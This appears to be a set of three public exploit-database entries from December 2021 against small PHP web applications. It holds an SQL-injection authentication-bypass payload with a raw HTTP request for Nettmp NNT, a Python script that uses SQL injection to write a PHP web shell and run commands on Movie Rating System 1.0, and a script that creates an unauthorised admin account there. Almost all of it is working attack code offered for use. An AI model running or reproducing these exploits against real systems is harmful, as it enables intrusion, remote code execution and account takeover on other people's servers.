<pre><code># Exploit Title: Nettmp NNT 5.1 - SQLi Authentication Bypass<br /># Date: 23/12/2021<br /># Exploit Author: Momen Eldawakhly (Cyber Guy)<br /># Vendor Homepage: https://wiki.nettemp.tk<br /># Software Link: https://wiki.nettemp.tk<br /># Version: nettmp NNT<br /># Tested on: Linux (Ubuntu 20.04)<br /><br />Payload:<br /><br />username: 1' or 1=1;--<br />password: \<br /><br />Proof of Concept:<br /><br />POST /index.php?id=status HTTP/1.1<br />Host: vuln.com<br />User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 55<br />Origin: http://vuln.com<br />DNT: 1<br />Connection: close<br />Referer: http://vulnIP/index.php?id=status<br />Cookie: PHPSESSID=v8hmih4u92mftquen8gtvpstsq<br />Upgrade-Insecure-Requests: 1<br /><br />username=1%27+or+1%3D1%3B--&password=%5C&form_login=log<br /><br /></code></pre>
<pre><code># Exploit Title: Movie Rating System 1.0 - SQLi to RCE (Unauthenticated)<br /># Date: 22/12/2021<br /># Exploit Author: Tagoletta (Tağmaç)<br /># Software Link: https://www.sourcecodester.com/php/15104/sentiment-based-movie-rating-system-using-phpoop-free-source-code.html<br /># Version: 1.0<br /># Tested on: Ubuntu<br /># This exploit only works correctly if user is database administrator. if not user is database administrator, continue with sql injection payloads.<br /><br />import requests<br />import random<br />import string<br />from bs4 import BeautifulSoup<br /><br />url = input("TARGET = ")<br /><br />if not url.startswith('http://') and not url.startswith('https://'):<br /> url = "http://" + url<br />if not url.endswith('/'):<br /> url = url + "/"<br /><br />payload = "<?php if(isset($_GET['tago'])){ $cmd = ($_GET['tago']); system($cmd); die; } ?>"<br /><br />let = string.ascii_lowercase<br />shellname = ''.join(random.choice(let) for i in range(15))<br /><br />resp = requests.get(url)<br />htmlParser = BeautifulSoup(resp.text, 'html.parser')<br /><br />getMenu = htmlParser.findAll("a", {"class": "nav-link"})<br />selectPage = ""<br />for i in getMenu:<br /> if "movie" in i.text.lower():<br /> selectPage = i["href"]<br /> break<br /><br />selectPage = selectPage.replace("./","")<br />findSql = url + selectPage<br />resp = requests.get(findSql)<br />htmlParser = BeautifulSoup(resp.text, 'html.parser')<br />movieList = htmlParser.findAll("a", {"class" : "card card-outline card-primary shadow rounded-0 movie-item text-decoration-none text-dark"})<br /><br />sqlPage = movieList[0]["href"]<br />sqlPage = sqlPage.replace("./","")<br /><br />sqlPage = url + sqlPage<br /><br />print("\nFinding path")<br /><br />findPath = requests.get(sqlPage + '\'')<br />findPath = findPath.text[findPath.text.index("<b>Warning</b>: ")+17:findPath.text.index("</b> on line ")]<br />findPath = findPath[findPath.index("<b>")+3:len(findPath)]<br />print("injection page: "+sqlPage)<br /><br />parser = findPath.split('\\')<br />parser.pop()<br />findPath = ""<br />for find in parser:<br /> findPath += find + "/"<br /><br />print("\nFound Path : " + findPath)<br /><br />SQLtoRCE = "-1881' OR 1881=1881 LIMIT 0,1 INTO OUTFILE '#PATH#' LINES TERMINATED BY #PAYLOAD# -- -"<br />SQLtoRCE = SQLtoRCE.replace("#PATH#",findPath+shellname+".php")<br />SQLtoRCE = SQLtoRCE.replace("#PAYLOAD#", "0x3"+payload.encode("utf-8").hex())<br /><br />print("\n\nShell Uploading...")<br />status = requests.get(sqlPage+SQLtoRCE)<br /><br />shellOutput = requests.get(url+shellname+".php?tago=whoami")<br />print("\n\nShell Output : "+shellOutput.text)<br />print("\nShell Path : " + url+shellname+".php")<br /> <br /></code></pre>
<pre><code># Exploit Title: Movie Rating System 1.0 - Broken Access Control (Admin Account Creation) (Unauthenticated)<br /># Date: 22/12/2021<br /># Exploit Author: Tagoletta (Tağmaç)<br /># Software Link: https://www.sourcecodester.com/php/15104/sentiment-based-movie-rating-system-using-phpoop-free-source-code.html<br /># Version: 1.0<br /># Tested on: Windows<br /><br />import requests<br />import json<br /><br />url = input('Url:')<br />if not url.startswith('http://') and not url.startswith('https://'):<br /> url = "http://" + url<br />if not url.endswith('/'):<br /> url = url + "/"<br /><br />Username = "tago"<br />Password = "tagoletta"<br /><br />reqUrl = url + "classes/Users.php?f=save"<br /><br />reqHeaders = {<br /> "Accept": "*/*",<br /> "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryTagmac",<br /> "X-Requested-With": "XMLHttpRequest",<br /> "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36",<br /> "Origin": url}<br /><br />reqData = "------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\nTago\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\nLetta\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n"+Username+"\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n"+Password+"\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"type\"\r\n\r\n1\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"img\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryTagmac--\r\n"<br /><br />resp = requests.post(reqUrl, headers=reqHeaders, data=reqData)<br /><br />if resp.status_code == 200:<br /> print("Admin account created")<br /> reqUrl = url + "classes/Login.php?f=login"<br /><br /> reqHeaders = {<br /> "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",<br /> "X-Requested-With": "XMLHttpRequest",<br /> "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36",<br /> "Origin": url<br /> }<br /><br /> reqData = {"username": ""+Username+"", "password": ""+Password+""}<br /><br /> resp = requests.post(reqUrl, headers=reqHeaders, data=reqData)<br /><br /> data = json.loads(resp.text)<br /> status = data["status"]<br /><br /> if status == "success":<br /> print("Login Successfully\nUsername:"+ Username+"\nPassword:"+Password)<br /> else:<br /> print("Exploited but not loginned")<br />else:<br /> print("Not injectable")<br /> <br /></code></pre>